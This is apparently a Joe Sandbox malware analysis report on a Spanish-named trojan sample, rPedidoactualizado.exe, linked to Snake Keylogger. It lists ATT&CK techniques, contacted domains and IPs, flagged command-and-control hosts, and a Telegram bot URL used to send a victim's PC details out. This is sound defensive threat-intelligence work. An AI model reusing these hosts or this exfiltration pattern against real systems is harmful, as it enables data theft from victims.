Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	2 Obfuscated Files or Information	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 PowerShell	Boot or Logon Initialization Scripts	1 Access Token Manipulation	1 Software Packing	LSASS Memory	14 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	311 Process Injection	1 DLL Side-Loading	Security Account Manager	11 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Masquerading	NTDS	1 Process Discovery	Distributed Component Object Model	1 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	21 Virtualization/Sandbox Evasion	LSA Secrets	21 Virtualization/Sandbox Evasion	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Access Token Manipulation	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	311 Process Injection	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
rPedidoactualizado.exe	14%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\rPedidoactualizado.exe	5%	ReversingLabs
C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\rPedidoactualizado.exe	14%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
drive.google.com	0%	Virustotal	Browse
drive.usercontent.google.com	1%	Virustotal	Browse
reallyfreegeoip.org	0%	Virustotal	Browse
api.telegram.org	2%	Virustotal	Browse
checkip.dyndns.com	0%	Virustotal	Browse
checkip.dyndns.org	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
http://nsis.sf.net/NSIS_ErrorError	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/8.46.123.33	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
http://varders.kozow.com:8081	0%	URL Reputation	safe
http://aborters.duckdns.org:8081	100%	URL Reputation	malware
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
https://aka.ms/pscore6lB	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/8.46.123.33$	0%	URL Reputation	safe
http://anotherarmy.dns.army:8081	100%	URL Reputation	malware
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
https://apis.google.com	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe
https://api.telegram.org/bot	4%	Virustotal		Browse
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Virustotal		Browse
https://api.telegram.org	1%	Virustotal		Browse
http://www.apache.org/licenses/LICENSE-2.0.html	0%	Virustotal		Browse
https://www.office.com/	0%	Virustotal		Browse
https://www.office.com/lB	0%	Virustotal		Browse
https://drive.usercontent.google.com/	1%	Virustotal		Browse
https://www.office.com/N	0%	Virustotal		Browse
https://github.com/Pester/Pester	1%	Virustotal		Browse
https://api.telegram.org/bot/sendMessage?chat_id=&text=	2%	Virustotal		Browse
https://www.google.com	0%	Virustotal		Browse
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20a	2%	Virustotal		Browse
https://drive.google.com/	0%	Virustotal		Browse
https://chrome.google.com/webstore?hl=en	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
drive.google.com	216.58.206.46	true	false	0%, Virustotal, Browse	unknown
drive.usercontent.google.com	216.58.206.65	true	false	1%, Virustotal, Browse	unknown
reallyfreegeoip.org	188.114.96.3	true	true	0%, Virustotal, Browse	unknown
api.telegram.org	149.154.167.220	true	true	2%, Virustotal, Browse	unknown
checkip.dyndns.com	158.101.44.242	true	false	0%, Virustotal, Browse	unknown
checkip.dyndns.org	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20and%20Time:%2008/10/2024%20/%2010:37:02%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20878411%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false		unknown
https://reallyfreegeoip.org/xml/8.46.123.33	false	URL Reputation: safe	unknown
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.office.com/	msiexec.exe, 00000005.00000002.3290429199.0000000021631000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://duckduckgo.com/chrome_newtab	msiexec.exe, 00000005.00000002.3292249295.0000000022461000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.2347373016.0000000006338000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	msiexec.exe, 00000005.00000002.3292249295.0000000022461000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org	msiexec.exe, 00000005.00000002.3290429199.0000000021524000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	msiexec.exe, 00000005.00000002.3292249295.0000000022461000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000002.00000002.2344675031.0000000005426000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot	msiexec.exe, 00000005.00000002.3290429199.0000000021524000.00000004.00000800.00020000.00000000.sdmp	false	4%, Virustotal, Browse	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000002.00000002.2344675031.0000000005426000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://www.office.com/N	msiexec.exe, 00000005.00000002.3290429199.0000000021622000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://contoso.com/License	powershell.exe, 00000002.00000002.2347373016.0000000006338000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.office.com/lB	msiexec.exe, 00000005.00000002.3290429199.000000002162C000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://contoso.com/Icon	powershell.exe, 00000002.00000002.2347373016.0000000006338000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	msiexec.exe, 00000005.00000002.3292249295.0000000022461000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.microCI	powershell.exe, 00000002.00000002.2349073799.0000000007A60000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://drive.usercontent.google.com/	msiexec.exe, 00000005.00000003.2446661266.00000000058F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2415047940.00000000058F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3277125256.00000000058E8000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
http://checkip.dyndns.org	msiexec.exe, 00000005.00000002.3290429199.0000000021441000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	msiexec.exe, 00000005.00000002.3292249295.0000000022461000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	rPedidoactualizado.exe, rPedidoactualizado.exe.2.dr	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=	msiexec.exe, 00000005.00000002.3290429199.0000000021524000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse	unknown
https://chrome.google.com/webstore?hl=en	msiexec.exe, 00000005.00000002.3290429199.0000000021600000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3290429199.00000000215F1000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://www.ecosia.org/newtab/	msiexec.exe, 00000005.00000002.3292249295.0000000022461000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://varders.kozow.com:8081	msiexec.exe, 00000005.00000002.3290429199.0000000021441000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000002.00000002.2344675031.0000000005426000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
http://aborters.duckdns.org:8081	msiexec.exe, 00000005.00000002.3290429199.0000000021441000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://ac.ecosia.org/autocomplete?q=	msiexec.exe, 00000005.00000002.3292249295.0000000022461000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20a	msiexec.exe, 00000005.00000002.3290429199.0000000021524000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse	unknown
https://www.google.com	msiexec.exe, 00000005.00000003.2408195744.00000000058F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2408265004.00000000058F1000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://drive.usercontent.google.com/PV	msiexec.exe, 00000005.00000003.2446661266.00000000058F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2415047940.00000000058F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3277125256.00000000058E8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://aka.ms/pscore6lB	powershell.exe, 00000002.00000002.2344675031.00000000052D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.33$	msiexec.exe, 00000005.00000002.3290429199.00000000214FE000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3290429199.0000000021524000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3290429199.00000000214B8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://drive.google.com/	msiexec.exe, 00000005.00000002.3277125256.000000000587A000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://anotherarmy.dns.army:8081	msiexec.exe, 00000005.00000002.3290429199.0000000021441000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	msiexec.exe, 00000005.00000002.3292249295.0000000022461000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 00000002.00000002.2347373016.0000000006338000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.2347373016.0000000006338000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://chrome.google.com/webstore?hl=enlB	msiexec.exe, 00000005.00000002.3290429199.00000000215FB000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://reallyfreegeoip.org	msiexec.exe, 00000005.00000002.3290429199.00000000214FE000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3290429199.0000000021524000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3290429199.000000002148E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://chrome.google.com/webstore?hl=enN	msiexec.exe, 00000005.00000002.3290429199.00000000215F1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://apis.google.com	msiexec.exe, 00000005.00000003.2408195744.00000000058F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2408265004.00000000058F1000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.2344675031.00000000052D1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3290429199.0000000021441000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	msiexec.exe, 00000005.00000002.3292249295.0000000022461000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/	msiexec.exe, 00000005.00000002.3290429199.000000002148E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
188.114.96.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true
216.58.206.65	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
158.101.44.242	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
216.58.206.46	drive.google.com	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1528590
Start date and time:	2024-10-08 03:31:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	rPedidoactualizado.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/12@5/5
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 97% Number of executed functions: 143 Number of non-executed functions: 54
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target msiexec.exe, PID 2364 because it is empty
Execution Graph export aborted for target powershell.exe, PID 5408 because it is empty
Not all processes where analyzed, report is missing behavior information
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
21:31:56	API Interceptor	34x Sleep call for process: powershell.exe modified
21:32:40	API Interceptor	102293x Sleep call for process: msiexec.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	EUYIlr7uUX.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	wrong bank details.exe	Get hash	malicious	MassLogger RAT	Browse
	z1PO7311145.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	PO.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	rREQUESTFORQUOTE-INQUIRY87278.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse
	SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Yeni Sipari#U015f.pdf.exe	Get hash	malicious	AgentTesla	Browse
	COMPANY PROFILE_pdf.exe	Get hash	malicious	DarkTortilla, Snake Keylogger	Browse
	Pla#U0107anje,jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
188.114.96.3	RFQ 245801.exe	Get hash	malicious	FormBook	Browse	www.j88.travel/c24t/?9rm4ULV=iDjdFcjw5QZJ8NeJJL4ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+m2NwmP2xDXw&D4hl2=fT-dvVK08nUDKdF
	74qgPmarBM.exe	Get hash	malicious	Pony	Browse	kuechenundmehr.com/x.htm
	PURCHASE ORDER-6350.exe	Get hash	malicious	FormBook	Browse	www.cc101.pro/ttiz/
	http://revexhibition.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	revexhibition.pages.dev/favicon.ico
	http://meta.case-page-appeal.eu/community-standard/112225492204863/	Get hash	malicious	Unknown	Browse	meta.case-page-appeal.eu/assets/k9854w4e5136q5a-f2169603.png
	http://www.tkmall-wholesale.com/	Get hash	malicious	Unknown	Browse	www.tkmall-wholesale.com/
	c1#U09a6.exe	Get hash	malicious	Unknown	Browse	winfileshare.com/ticket_line/llb.php
	QUOTATION_OCTQTRA071244PDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/eZFzMENr/download
	QUOTATION_OCTQTRA071244PDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/eZFzMENr/download
	1tstvk3Sls.exe	Get hash	malicious	RHADAMANTHYS	Browse	microsoft-rage.world/Api/v3/qjqzqiiqayjq

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	EUYIlr7uUX.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Justificante de pago.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	RFQ Ref. No CRCCRFQHAFJIHDG2-KSU001 REV.01..exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	wrong bank details.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	z1PO7311145.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	PO.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	rREQUESTFORQUOTE-INQUIRY87278.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	172.67.177.134
checkip.dyndns.com	EUYIlr7uUX.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	Justificante de pago.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	RFQ Ref. No CRCCRFQHAFJIHDG2-KSU001 REV.01..exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	wrong bank details.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	z1PO7311145.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	PO.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	rREQUESTFORQUOTE-INQUIRY87278.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
api.telegram.org	EUYIlr7uUX.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	wrong bank details.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	z1PO7311145.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	PO.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	rREQUESTFORQUOTE-INQUIRY87278.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Yeni Sipari#U015f.pdf.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	COMPANY PROFILE_pdf.exe	Get hash	malicious	DarkTortilla, Snake Keylogger	Browse	149.154.167.220
	Pla#U0107anje,jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	T2bmenoX1o.exe	Get hash	malicious	LummaC, Vidar	Browse	149.154.167.99
	EUYIlr7uUX.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Bn7LPdQA1s.exe	Get hash	malicious	LummaC, Vidar	Browse	149.154.167.99
	WiTqtf1aiE.exe	Get hash	malicious	LummaC, Vidar	Browse	149.154.167.99
	down.exe	Get hash	malicious	Unknown	Browse	149.154.167.99
	wrong bank details.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	z1PO7311145.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	PO.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	rREQUESTFORQUOTE-INQUIRY87278.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
CLOUDFLARENETUS	SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe	Get hash	malicious	RDPWrap Tool	Browse	172.67.140.92
	SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe	Get hash	malicious	RDPWrap Tool	Browse	172.67.140.92
	hloRQZmlfg.exe	Get hash	malicious	RDPWrap Tool	Browse	188.114.96.3
	SecuriteInfo.com.Trojan.DownLoader47.43340.27469.30352.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	https://starylasfe.com.de/6SZZr/	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	2ngxhElaud.exe	Get hash	malicious	Xmrig	Browse	172.67.173.168
	copyright_infringement_evidence_1.exe	Get hash	malicious	Unknown	Browse	172.67.158.129
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	Copyright_Infringement_Evidence.exe	Get hash	malicious	Unknown	Browse	172.67.158.129
ORACLE-BMC-31898US	Justificante de pago.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	XvAqhy3FO6.elf	Get hash	malicious	Mirai, Okiru	Browse	150.136.104.146
	RFQ Ref. No CRCCRFQHAFJIHDG2-KSU001 REV.01..exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	z1PO7311145.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	PO.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	rREQUESTFORQUOTE-INQUIRY87278.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	#Uc740#Ud589_#Uc0c1#Uc138#Uc815#Ubcf4.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	movimiento_INGDIRECT.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	Pla#U0107anje,jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	sam.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	158.101.44.242

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	EUYIlr7uUX.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	https://s.craft.me/yB5midhwwaHUPW	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	Justificante de pago.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	RFQ Ref. No CRCCRFQHAFJIHDG2-KSU001 REV.01..exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	wrong bank details.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	z1PO7311145.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	rREQUESTFORQUOTE-INQUIRY87278.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
3b5074b1b5d032e5620f69f9f700ff0e	SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe	Get hash	malicious	RDPWrap Tool	Browse	149.154.167.220
	SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe	Get hash	malicious	RDPWrap Tool	Browse	149.154.167.220
	hloRQZmlfg.exe	Get hash	malicious	RDPWrap Tool	Browse	149.154.167.220
	2ngxhElaud.exe	Get hash	malicious	Xmrig	Browse	149.154.167.220
	https://Vv.ndlevesio.com/vrbU/	Get hash	malicious	Unknown	Browse	149.154.167.220
	x2Yi9Hr77a.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	file.exe	Get hash	malicious	Xmrig	Browse	149.154.167.220
	http://hans.uniformeslaamistad.com/prog/66f5db9e54794_vfkagks.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	STlUEqhwpx.exe	Get hash	malicious	Quasar	Browse	149.154.167.220
	EUYIlr7uUX.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
37f463bf4616ecd445d4a1937da06e19	T2bmenoX1o.exe	Get hash	malicious	LummaC, Vidar	Browse	216.58.206.65 216.58.206.46
	ArT23Ix6Ox.exe	Get hash	malicious	Unknown	Browse	216.58.206.65 216.58.206.46
	cqKYl7T4CR.exe	Get hash	malicious	Unknown	Browse	216.58.206.65 216.58.206.46
